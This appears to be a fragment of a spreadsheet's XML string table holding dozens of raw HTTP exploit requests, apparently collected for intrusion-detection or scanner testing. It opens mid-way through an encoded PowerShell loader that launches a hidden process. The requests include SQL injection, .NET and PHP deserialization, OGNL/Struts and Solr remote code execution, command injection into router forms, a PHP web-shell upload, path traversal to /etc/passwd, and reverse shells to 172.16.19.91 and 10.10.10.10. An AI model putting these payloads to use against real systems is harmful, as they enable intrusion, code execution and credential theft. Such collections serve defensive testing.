WGpiQ0pPJycrJydmQ2U0OHgvMnFhTU9iWU5NajY0VGJXZicnKycnMkxUK3pGN08xR294bmcyQzJjQU5yNU83N0ZnOHh2REcrZ0p4a3VtVGpLb3ZCL0ZrMDdHM0V1WU84c2dkRHgxVURKMUFkeGI4ZWNnWW5WODZOWTNqTy9HaVJoVzV4a2VaSTBkUycnKycnbDlvbHk3Y2F6Mll5cjVxWkZibTM3L2xGM1ppTm4wT3swfU5PTEFzTitYVzNIMisyQTIvb0Yzd0hPd08xNllxeXRPYmhZZWNtU3swfUlnQ1dvaGhqWE9KcWpVTkFmcycnKycnVnlqcjRpV3pRSE9aZUdNdGs5ZDNzYkRLazYvezB9SEI0K05GTk4nJysnJ3k0WnBxR2tReDdFdzk0Z2xhY09HWmFKTTBqU2VTM2V2WGRBcCcnKycnMmpSZUgyMGFSNmMnJysnJ1l3MWNHRTNuY3dSY0FEN3pLcmRWRC97MH1RZ2xnT3k1MTFNSkJ3a1FjKzMzTkNXVDdlS1RibHYrVzZlNGgvezB9T1EnJysnJ2diMlFaZkJPRWFTMUg4TTcrWUwvSTdYaXdveVVKL0NyNGVXQVQwa2lvZmYxZ3gzZnkzaHYyTGp5eHNWVDErOHBCTlkrTE5GY2hkeVRxRjBlMmtqdElCWmR5N2FuezB9cDJUZDVhZWZ7MH0vOEcnJysnJ0ZXUnA0NlM0dVY0MW5xMzUwNWErcmIvKzBxaWs3RTBaK1Y3bm9IdFpIbmtFeWcnJysnJ3QwQkpmeXJxU1pjbjdtSnltbUVpeExtOFVkeWhKRW9NR0NGdXhTR2dWQ1VwLzJHS2QrQUJxY1U5dEJ1eUJicTkxNjc2dkZ2QnhzdmZZZWw2VnswfW54YmdKWlRidWhwMlJpZ0ppNicnKycnak5WVGNjQjIwRFYzRzl1clQrK09YNjZmN0luclMxYWVkQjBYbFJUMnIxb0JGdkdKYjk2WWhCZzEnJysnJ25BYy9jM21IMHswfXswfXJDOWd5Y0szc3ZUMjBGQkZOT1V2SVh3ZExNWFJud0ZJQ0RIdytXWHRMczhjUVZVWEtGJycrJydIcGxIUTV1dHRNJycrJyc5YzQ5SDRxZTg1ezB9WUFSL2duOWt6K3ZhMyt6K0VLTzRkbzN7MH1ONnRmTDd4cEhINGVBcTZIQ3pob3drdE8wS21yL0E0UTU0eDVFK05ERDVKaGN4NzB7MH02JycrJycxeFdWd1owTGZYM2NSL0FjT1pEVXJoRFFBQScnKS1mJydQJycpKSkpLFtTeXN0ZW0uSU8uQ29tcHJlc3Npb24uQ29tcHJlc3Npb25Nb2RlXTo6RGVjb21wcmVzcykpKS5SZWFkVG9FbmQoKSkpJzskcy5Vc2VTaGVsbEV4ZWN1dGU9JGZhbHNlOyRzLlJlZGlyZWN0U3RhbmRhcmRPdXRwdXQ9JHRydWU7JHMuV2luZG93U3R5bGU9J0hpZGRlbic7JHMuQ3JlYXRlTm9XaW5kb3c9JHRydWU7JHA9W1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzXTo6U3RhcnQoJHMpOyI%3d%22%29%29%7d%29%27%29</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /vulnerabilities/sqli_blind/?id=1%29%28SELECT%20%28CASE%20WHEN%20%283701%3D3701%29%20THEN%20REGEXP_SUBSTRING%28REPEAT%28LEFT%28CRYPT_KEY%28CHAR%2865%29%7C%7CCHAR%2869%29%7C%7CCHAR%2883%29%2CNULL%29%2C0%29%2C500000000%29%2CNULL%29%20ELSE%20CHAR%28106%29%7C%7CCHAR%2898%29%7C%7CCHAR%28102%29%7C%7CCHAR%2878%29%20END%29%20FROM%20%28VALUES%280%29%29%29--%20PRkX&amp;Submit=Submit HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /vulnerabilities/sqli_blind/?id=1%29%20AND%20CHAR%28104%29%7C%7CCHAR%2872%29%7C%7CCHAR%28106%29%7C%7CCHAR%2899%29%3DREGEXP_SUBSTRING%28REPEAT%28RIGHT%28CHAR%286161%29%2C0%29%2C5000000000%29%2CNULL%29--%20fVrS&amp;Submit=Submit HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /FactoryTalkLogReader HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 1338
Accept-Encoding: identity
Content-Type: application/octet-stream
......................)System.Security.Principal.WindowsIdentity....$System.Security.ClaimsIdentity.actor.......	AAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAAtgU8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI/Pg0KPE9iamVjdERhdGFQcm92aWRlciBNZXRob2ROYW1lPSJTdGFydCIgSXNJbml0aWFsTG9hZEVuYWJsZWQ9IkZhbHNlIiB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIiB4bWxuczpzZD0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uRGlhZ25vc3RpY3M7YXNzZW1ibHk9U3lzdGVtIiB4bWxuczp4PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCI+DQogIDxPYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQogICAgPHNkOlByb2Nlc3M+DQogICAgICA8c2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgICAgIDxzZDpQcm9jZXNzU3RhcnRJbmZvIEFyZ3VtZW50cz0iL2MgY2FsYy5leGUiIFN0YW5kYXJkRXJyb3JFbmNvZGluZz0ie3g6TnVsbH0iIFN0YW5kYXJkT3V0cHV0RW5jb2Rpbmc9Int4Ok51bGx9IiBVc2VyTmFtZT0iIiBQYXNzd29yZD0ie3g6TnVsbH0iIERvbWFpbj0iIiBMb2FkVXNlclByb2ZpbGU9IkZhbHNlIiBGaWxlTmFtZT0iY21kIiAvPg0KICAgICAgPC9zZDpQcm9jZXNzLlN0YXJ0SW5mbz4NCiAgICA8L3NkOlByb2Nlc3M+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPg0KPC9PYmplY3REYXRhUHJvdmlkZXI+Cw==.</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /.git/config HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /HNAP1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 71
Accept-Encoding: identity
Content-Type: application/json
Hnap_auth: 84E9E7AB41420A00EC4C179066EAF998 1646491157369
Soapaction: "http://purenetworks.com/HNAP1/SetNTPServerSettings"
{"SetNTPServerSettings":{"system_time_timezone":"$(ls &gt; /www/web/ls)"}}</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /wp-admin/admin-ajax.php?action=stm_lms_register&amp;nonce=[NONCE] HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 325
Accept-Encoding: identity
Content-Type: application/json
X-Requested-With: XMLHttpRequest
{"user_login":"USERNAME","user_email":"EMAIL@TLD","user_password":"PASSWORD","user_password_re":"PASSWORD","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /imc/icc/taskmng/viewBatchTaskResultDetailFact.xhtml;.jar?queryType=1&amp;beanName=facesContext.getClass%28%29.getClassLoader%28%29.getSystemClassLoader%28%29.loadClass%28%22javax.script.%22.concat%28%22ScriptEngineManager%22%29%29.newInstance%28%29.getEngineByName%28%22js%22%29.eval%28%22java.lang.Runtime.getRuntime%28%29.exec%28%5C%22calc%5C%22%29%22%29 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /admin/index.php?module=file_editor&amp;file=/../../../../../../../../../../../etc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /_search?pretty HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Connection: close
Content-Length: 356
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /sqLServer/SeArcH/sEarch.AsP?name=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /rest/fabrics HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Content-Length: 428
Accept-Encoding: identity
Content-Type: application/json
{"generalSetting": {"provisionOption": "Manual", "asn": "1337"}, "name": "svpflyxm\";'`{ruby,-rsocket,-e'c=TCPSocket.new(\"172.16.19.91\",\"1337\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print(io.read)}end'}`'\"", "provisionSetting": {"amqpSetting": {"server": "127.0.0.1:1337"}, "dhcpSetting": {"primarySubnet": "127.0.0.1", "primaryDNS": "127.0.0.1", "secondaryDNS": "127.0.0.1"}, "ldapSetting": {"server": "127.0.0.1"}}}</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /alsdfjiasdlkamalskdf.html%3fasdflkaijfaldjflaskfoeialsdfkaj=/../sqlserver/search/search.asp?name=1%20or%201=1%20-- HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /ispirit/interface/gateway.php?json=%7B%22url%22:%22general/attachment/shell.php.png%22%7D&amp;cmd=echo%20bash%20-i%20%3E&amp;%20/dev/tcp/10.10.10.10/9001%200%3E&amp;1; HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /main.php?sessid=6ca89212aceb7b4b6997d3b1b4b9eaf0&amp;act=netdisk&amp;opt=download&amp;ftpfolder=Lw%3D%3D&amp;filename=cGhwaW5mby5waHA%3D&amp;retid=33938934 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Accept-Encoding: identity
Proxy-Connection: keep-alive
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 113
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
hostname=x+-oProxyCommand%3decho%09ZWNobyAnSGVsbG8nPi90bXAvdGVzdA%3d%3d|base64%09-d|sh}&amp;username=222&amp;password=333</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /jsrpc.php?output=json-rpc HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 113
Accept-Encoding: identity
Content-Type: application/json-rpc
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
{"jsonrpc": "2.0", "method": "zabbix.status", "params": {}, "auth": "70d34a4c6232f61e12024645de74242e", "id": 26}</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">POST /context.json HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Content-Length: 1052
Accept-Encoding: identity
{
  "personalizations":[
    {
      "id":"gender-test",
      "strategy":"matching-first",
      "strategyOptions":{
        "fallback":"var2"
      },
      "contents":[
        {
          "filters":[
            {
              "condition":{
                "parameterValues":{
                  "propertyName":"(#runtimeclass = #this.getClass().forName(\"java.lang.Runtime\")).(#getruntimemethod = #runtimeclass.getDeclaredMethods().{^ #this.name.equals(\"getRuntime\")}[0]).(#rtobj = #getruntimemethod.invoke(null,null)).(#execmethod = #runtimeclass.getDeclaredMethods().{? #this.name.equals(\"exec\")}.{? #this.getParameters()[0].getType().getName().equals(\"java.lang.String\")}.{? #this.getParameters().length &lt; 2}[0]).(#execmethod.invoke(#rtobj,\" command\"))",
                  "comparisonOperator":"equals",
                  "propertyValue":"male"
                },
                "type":"profilePropertyCondition"
              }
            }
          ]
        }
      ]
    }
  ],
  "sessionId":"2333"
} </t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /RPC2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Content-Length: 213
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
&lt;?xml version="1.0"?&gt;
&lt;methodCall&gt;
&lt;methodName&gt;supervisor.supervisord.options.warnings.linecache.os.system&lt;/methodName&gt;
&lt;params&gt;
&lt;param&gt;
&lt;string&gt;touch /tmp/success&lt;/string&gt;
&lt;/param&gt;
&lt;/params&gt;
&lt;/methodCall&gt;</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /q?start=2000/10/21-00:00:00&amp;m=sum:sys.cpu.nice&amp;o&amp;ylabel&amp;xrange=10:10&amp;yrange=[0:system(%27touch%20/tmp/success%27)]&amp;wxh=1516x644&amp;style=linespoint&amp;baba=lala&amp;grid=t&amp;json HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /checkValid HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
Connection: close
Content-Length: 124
Accept-Encoding: identity
Authorization: Basic YWRtaW46cGFzcw==
Content-Type: application/x-www-form-urlencoded
document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /vulnerabilities/sqli_blind/?id=1%29%3BIIF%282067%3D9387%2C1%2C1%2F0%29%16&amp;Submit=Submit HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /code_exc.php?a=%3CScRiPt+%3EkhrK(5297)%3C/ScRiPt%3E HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /assets/file:%2F%2F/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /defaultroot/officeserverservlet HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 301
Accept-Encoding: identity
Content-Type: multipart/form-data
DBSTEP V3.0     185             0               611             DBSTEP=REJTVEVQ
OPTION=U0FWRUZJTEU=
RECORDID=
firstFilesize=dHJ1ZQ==
isDoc=dHJ1ZQ==
moduleType=aW5mb3JtYXRpb24=
FILETYPE=Ly4uLy4uL3B1YmxpYy9lZGl0L2FhYS5qc3A=
isViewOld=MQ==
&lt;% out.println("bea86d66a5278f9e6fa1112d2e2fcebf"); %&gt;</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /service/rest/beta/repositories/go/group HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Content-Length: 168
Accept-Encoding: identity
Content-Type: application/json
Nx-Anti-Csrf-Token: 0.2923785139192667
X-Forwarded-For: 127.0.0.1
X-Nexus-Ui: true
X-Requested-With: XMLHttpRequest
{ "name": "internal", "online": true, "storage": { "blobStoreName": "default", "strictContentTypeValidation": true }, "group": { "memberNames": ["$\\A{233*233*233}"] }}</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /data HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /?a=Admin/Supervisor&amp;b=Search HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /%20HTTP/1.1%0d%0aAccept%3a%20$s/../../sqLServer/SeArcH/sEarch.AsP?name=ao'%20or%201=1%20-- HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /goform/SetSysTimeCfg HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36
Connection: close
Content-Length: 79
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
timePeriod=86400&amp;ntpServer="time.windows.com| ls &gt; /tmp/f0und"&amp;timeZone=20%3A00</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /admin/config/development/configuration/single/import HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 538
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
config_type=system.simple&amp;config_name=123&amp;import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&amp;custom_entity_id=&amp;form_build_id=form-CUNhm97pHAW5vtQNyQT1Eb-U9gGwCnTfwjrwKWlcLgo&amp;form_token=Vhp4yne9jE35jvajiWI_9PNYcLh2vEe2N543L1s3u-c&amp;form_id=config_single_import_form&amp;op=%E5%AF%BC%E5%85%A5</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /singleuser_action.php HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Content-Length: 574
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Requested-With: XMLHttpRequest
{ "syncInfo": { "user": { "userId": "001", "userName": "001", "employeeId": "001", "departmentId": "001", "departmentName": "001", "coporationId": "001", "corporationName": "001", "userSex": "1",  "userDuty": "001", "userBirthday": "001", "userPost": "001", "userPostCode": "001", "userAlias": "001", "userRank": "001", "userPhone": "001", "userHomeAddress": "001", "userMobilePhone": "001", "userMailAddress": "001", "userMSN": "001", "userNt": "001", "userCA": "001", "userPwd": "001", "userClass": "001", "parentId": "001", "bxlx": "001" },"operationType": "ADD_USER" } }</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">POST /admin/settings/user HTTP/1.1
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 1091
Accept-Encoding: identity
Content-Type: multipart/form-data; boundary=127.0.1.1.0.3979.1407140346.314.1
--127.0.1.1.0.3979.1407140346.314.1
Content-Disposition: form-data; name="form_name"
userSettingsForm
--127.0.1.1.0.3979.1407140346.314.1
Content-Disposition: form-data; name="displayName"
realname
--127.0.1.1.0.3979.1407140346.314.1
Content-Disposition: form-data; name="confirmEmail"
on
--127.0.1.1.0.3979.1407140346.314.1
Content-Disposition: form-data; name="avatarSize"
90
--127.0.1.1.0.3979.1407140346.314.1
Content-Disposition: form-data; name="bigAvatarSize"
190
--127.0.1.1.0.3979.1407140346.314.1
Content-Disposition: form-data; name="avatar"
--127.0.1.1.0.3979.1407140346.314.1
Content-Disposition: form-data; name="join_display_photo_upload"
display
--127.0.1.1.0.3979.1407140346.314.1
Content-Disposition: form-data; name="save"
Save
--127.0.1.1.0.3979.1407140346.314.1
Content-Disposition: file; name="bigAvatar"; filename="thricerbd.php5"
Content-Type: application/octet-stream
&lt;?php system('echo "&lt;?php echo \"&lt;pre&gt;\"; passthru(\$_GET[\'cmd\']); echo \"&lt;/pre&gt;\"; ?&gt;" &gt; liwo.php5'); ?&gt;
--127.0.1.1.0.3979.1407140346.314.1--
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /context.json HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36
Connection: close
Content-Length: 476
Accept-Encoding: identity
{
    "filters": [
        {
            "id": "2333",
            "filters": [
                {
                    "condition": {
                         "parameterValues": {
                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"command \");"
                        },
                        "type": "profilePropertyCondition"
                    }
                }
            ]
        }
    ],
    "sessionId": "2333"
}</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">POST /?-%64+allow_url_include%3d1+--define+safe_mode%3d0+-%64+suhosin.simulation%3dTRue+--define+disable_functions%3d%22%22+-d+open_basedir%3dnone+--define+auto_prepend_file%3dphp://input+--define+cgi.force_redirect%3doff+-d+cgi.redirect_status_env%3d0+-n HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 6
Accept-Encoding: identity
Content-Type: application/x-www-form-urlencoded
&lt;?php </t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /solr/test/select?q=1&amp;&amp;wt=velocity&amp;v.template=custom&amp;v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: identity
Pragma: no-cache
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t>POST /solr/demo/config HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 158
Accept-Encoding: identity
{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "touch /tmp/success"]}}</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /beescms/admin/admin_book.php?action=del&amp;lang=cn&amp;id=1*&amp;nav=main&amp;admin_p_nav=main_info HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept-Encoding: identity
</t>
    <phoneticPr fontId="4" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">GET /doUpload.action HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
Accept-Encoding: identity
Content-Type: %{(#_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data=@org.apache.struts2.ServletActionContext@getRequest().getHeader('X-tGwE')).(#f=@java.io.File@createTempFile('iosN','.exe')).(#f.setExecutable(true)).(#f.deleteOnExit()).(#fos=new java.io.FileOutputStream(#f)).(#d=new sun.misc.BASE64Decoder().decodeBuffer(#data)).(#fos.write(#d)).(#fos.close()).(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).(#p.start()).(#f.delete())}
